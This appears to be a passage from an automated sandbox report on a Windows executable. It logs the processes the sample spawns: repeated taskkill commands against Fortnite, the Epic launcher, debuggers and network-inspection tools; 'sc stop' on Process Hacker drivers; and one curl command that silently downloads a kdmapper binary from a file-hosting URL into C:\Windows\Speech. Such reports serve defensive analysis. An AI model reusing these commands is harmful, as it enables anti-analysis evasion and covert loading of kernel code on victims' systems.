Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop KProcessHacker1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop KProcessHacker3	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im OllyDbg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
